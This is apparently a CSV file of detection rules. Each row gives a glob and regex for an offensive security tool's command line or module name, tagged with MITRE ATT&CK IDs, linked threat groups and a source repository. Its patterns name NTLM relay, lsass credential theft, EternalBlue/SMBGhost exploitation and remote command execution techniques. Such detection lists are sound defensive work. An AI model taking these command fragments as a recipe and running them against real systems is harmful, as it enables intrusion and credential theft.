"*smb * -u * -p * -M ioxidresolver*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sioxidresolver.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","59653"
"*smb 1* -u * -p * -x ""whoami""*",".{0,1000}smb\s1.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-x\s\""whoami\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","59654"
"*smb.dcsync*",".{0,1000}smb\.dcsync.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","59655"
"*smb/impacket*",".{0,1000}smb\/impacket.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59656"
"*smb/relay/ntlm*",".{0,1000}smb\/relay\/ntlm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59657"
"*SMB\SigningNotRequired-*.txt*",".{0,1000}SMB\\SigningNotRequired\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","59658"
"*smb_doublepulsar_rce.*",".{0,1000}smb_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59659"
"*smb_doublepulsar_rce.rb*",".{0,1000}smb_doublepulsar_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59660"
"*smb_enumshares*",".{0,1000}smb_enumshares.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59661"
"*smb_enumshares.*",".{0,1000}smb_enumshares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59662"
"*smb_enumusers*",".{0,1000}smb_enumusers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59663"
"*smb_enumusers.*",".{0,1000}smb_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59664"
"*smb_enumusers_domain.*",".{0,1000}smb_enumusers_domain\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59665"
"*smb_eternalblue*",".{0,1000}smb_eternalblue.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59666"
"*smb_ghost.py*",".{0,1000}smb_ghost\.py.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Discovery","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","7","7","N/A","N/A","N/A","N/A","59667"
"*smb_ms17_010_pass*",".{0,1000}smb_ms17_010_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59668"
"*smb_pipename_stager*",".{0,1000}smb_pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","59669"
"*smb_rras_erraticgopher.*",".{0,1000}smb_rras_erraticgopher\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59670"
"*smb_shadow.*",".{0,1000}smb_shadow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59671"
"*smb_shadow.rb*",".{0,1000}smb_shadow\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59672"
"*smb_stealth.py*",".{0,1000}smb_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","59673"
"*smb_win.py*",".{0,1000}smb_win\.py.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","N/A","10","1339","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z","59674"
"*smb1_anonymous_connect_ipc*",".{0,1000}smb1_anonymous_connect_ipc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59675"
"*smb1_anonymous_login*",".{0,1000}smb1_anonymous_login.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59676"
"*-smb2support --no-wcf-server --no-smb-server --no-http-server*",".{0,1000}\-smb2support\s\-\-no\-wcf\-server\s\-\-no\-smb\-server\s\-\-no\-http\-server.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","59677"
"*-smb2support --remove-mic --shadow-credentials --shadow-target *",".{0,1000}\-smb2support\s\-\-remove\-mic\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59678"
"*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59679"
"*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59680"
